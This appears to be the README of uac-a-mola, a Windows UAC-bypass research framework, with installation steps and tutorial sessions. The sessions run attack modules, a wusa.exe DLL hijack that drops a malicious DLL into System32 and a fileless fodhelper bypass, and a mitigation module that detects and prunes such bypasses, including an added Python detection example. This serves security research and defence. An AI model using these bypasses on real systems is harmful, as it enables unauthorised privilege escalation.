uac-a-mola

Installation

To install uac-a-mola you have to perform the following actions:

  1. Download and install Python 2.7.x for Windows, choosing the build that matches your particular infrastructure; you can find the binaries here: https://www.python.org/downloads/
  2. Add the Python path to the Path environment variable. You can do this by carrying out the following steps:
    1. Right click My Computer and left click Properties
    2. Left click Advanced system configuration
    3. Left click Environment Variables
    4. In the system variables box, double left click Path
    5. Left click New and add the following paths:
      • C:\Python27\
      • C:\Python27\scripts\
  3. Download the uac-a-mola tool from GitHub by downloading the .zip file or by cloning the repo.
  4. Open the folder uac-a-mola-master with a cmd and execute the following command:
     pip install -r requirements.txt

Uac-a-mola is now ready to rock! You can test its functionality by typing:

cd uacamola
python uacamola.py

Tutorial

This is a brief section that explains the use of some of the uac-a-mola modules:

Attack modules

Using the attack modules is very simple and hardly requires explanation. The only thing you have to do is load the corresponding module in the framework with the load command; you can see its options or input parameters with the show command, and with the run command the module is executed:

uac-a-mola> load .\modules\attack\dll_hijacking_wusa.py
[+] Loading module...
[+] Module loaded!
uac-a-mola[dll_hijacking_wusa.py]> show

 Author
 ------
 |_Pablo Gonzalez (pablo@11paths or @pablogonzalezpe)

 Name
 ----
 |_Copy DLL with wusa.exe

 Description
 -----------
 |_It's used for copy a DLL in privilege path (wusa method win7/8/8.1)


 Options (Field = Value)
 -----------------------
 |_name_dll = comctl32.dll (name of DLL)
 |
 |_binary = compmgmtlauncher.exe (Path to the vulnerable binary)
 |
 |_malicious_dll = C:\Users\ieuser\Desktop\uac-a-mola\uacamola\payloads\comctl32\comctl32.dll (Path to a malicious dll)
 |
 |_name_folder = x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2 (Name folder)
 |
 |_destination_path = C:\Windows\System32 (Destination path)


uac-a-mola[dll_hijacking_wusa.py]> run
[+] Running module...
creating path...
SUCCESS: done
copying dll in path...
SUCCESS: done
creating DDF file...
SUCCESS: done
creating CAB file...
SUCCESS: done
launch wusa.exe /extract
SUCCESS: done! got root? :D
removing path...
SUCCESS: done
uac-a-mola[dll_hijacking_wusa.py]>

Another example:

uac-a-mola> load modules\attack\fileless_fodhelper.py
[+] Loading module...
[+] Module loaded!
uac-a-mola[fileless_fodhelper.py]> show

 Author
 ------
 |_Santiago Hernandez Ramos

 Name
 ----
 |_Fileless Fodhelper

 Description
 -----------
 |_Fileless - Fodhelper bypass UAC

 Options (Field = Value)
 -----------------------
 |_instruction = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -C echo mola > c:\pwned.txt (Elevated Code)

uac-a-mola[fileless_fodhelper.py]> set instruction powershell.exe
uac-a-mola[fileless_fodhelper.py]> run
[+] Running module...

Mitigate modules

Using the mitigation modules is also quite simple, but they have a slightly more complex internal structure, which is explained in this section. Regarding their use, the first thing to do is to load the available mitigation module:

uac-a-mola> load modules\mitigation\bypass_mitigation.py
[+] Loading module...
[+] Module loaded!
uac-a-mola[bypass_mitigation.py]> show

 Author
 ------
 |_Santiago Hernandez Ramos

 Name
 ----
 |_This module will instrument the binaries selected and detect possible UAC bypasses

 Description
 -----------
 |_Bypass Mitigation

 Options (Field = Value)
 -----------------------
 |_[REQUIRED] password = None (Password for connection)
 |
 |_[REQUIRED] binlist_file = None (File with a list of binaries to hook, one on each line)
 |
 |_port = 5555 (Port for connection)

In this case, we need to set a password that the agents will use to communicate with the listener that runs in the uacamola framework. We can find the agents in the path uacamola/support/agents; opening those files we can see the password:

fodhelper_ag = Agent('fodhelper.exe', 'localhost', 5555, 'uacamola')
fodhelper_ag.send_forbidden("Software\\Classes\\ms-settings\\Shell\\Open\\command")

uacamola will be the password used for authentication and communication, but we can change it. The other required parameter is the path to a file that contains a list of binaries to monitor; each of these binaries must have an agent.pyw file in the agents path.

uac-a-mola[bypass_mitigation.py]> show

 Author
 ------
 |_Santiago Hernandez Ramos

 Name
 ----
 |_This module will instrument the binaries selected and detect possible UAC bypasses

 Description
 -----------
 |_Bypass Mitigation

 Options (Field = Value)
 -----------------------
 |_password = uacamola (Password for connection)
 |
 |_binlist_file = bins.txt (File with a list of binaries to hook, one on each line)
 |
 |_port = 5555 (Port for connection)

uac-a-mola[bypass_mitigation.py]> run
[+] Running module...
[+] Executing the listener...

--- Press ENTER for quit mitigate mode ---

After filling in these fields and executing the run command, uacamola will start monitoring all activity related to UAC bypasses in the binaries that appear in the list. If dangerous activity is detected, it automatically prunes the dangerous branch (of the file system or registry) and executes the binary in a secure way. To exit this mode, just press the ENTER key.
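As an added illustration of what the mitigation agents check (this is not uac-a-mola's own code), the following Python snippet reads a binary list in the bins.txt format, looks up the registry branch each binary's agent forbids, reports branches that exist in a registry snapshot, and prunes them before the binary would be allowed to run. The snapshot, the bins.txt text, the comment handling and the helper names are constructed for the example; only the fodhelper branch is the one shown above in uacamola/support/agents.

```python
# Added example, not uac-a-mola's own code: offline model of the agents' check.
# Registry snapshot, bins.txt text and helper names are constructed; only the
# fodhelper branch is the one the page shows in uacamola/support/agents.
import copy

# Constructed bins.txt (one binary per line; skipping blank and '#' lines is an
# assumption of this example, not a documented feature of the tool).
BINS_TXT = "fodhelper.exe\n\n# no agent -> ignored\ncompmgmtlauncher.exe\n"
# Branch each agent reports with send_forbidden (only fodhelper's is known).
FORBIDDEN = {
    "fodhelper.exe": "Software\\Classes\\ms-settings\\Shell\\Open\\command",
}
# Constructed HKCU snapshot as nested dicts of subkeys and value names.
SNAPSHOT = {"Software": {"Classes": {"ms-settings": {"Shell": {"Open": {
    "command": {"(Default)": "powershell.exe", "DelegateExecute": ""}}}}}}}

def parse_binlist(text):
    """Binaries listed in bins.txt, skipping blank lines and comments."""
    return [ln.strip() for ln in text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#")]

def branch_exists(snapshot, path):
    """True when every component of the backslash-separated path exists."""
    node = snapshot
    for part in path.split("\\"):
        if not isinstance(node, dict) or part not in node:
            return False
        node = node[part]
    return True

def prune_branch(snapshot, path):
    """Copy of the snapshot with the forbidden branch removed."""
    snap = copy.deepcopy(snapshot)
    node, parts = snap, path.split("\\")
    for part in parts[:-1]:
        node = node.get(part, {})
    node.pop(parts[-1], None)
    return snap

def check_binaries(bins_text, snapshot):
    """Listed binaries with an agent whose forbidden branch is present."""
    hits = {}
    for binary in parse_binlist(bins_text):
        path = FORBIDDEN.get(binary)
        if path and branch_exists(snapshot, path):
            hits[binary] = path
    return hits
```

A binary listed in bins.txt without an agent entry (compmgmtlauncher.exe here) is simply skipped, matching the requirement that every monitored binary has its own agent file.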

Research modules

Write your own modules

Support

Please report any error to [email protected] or open an issue on GitHub. Your collaboration is appreciated!

Contact

[email protected]
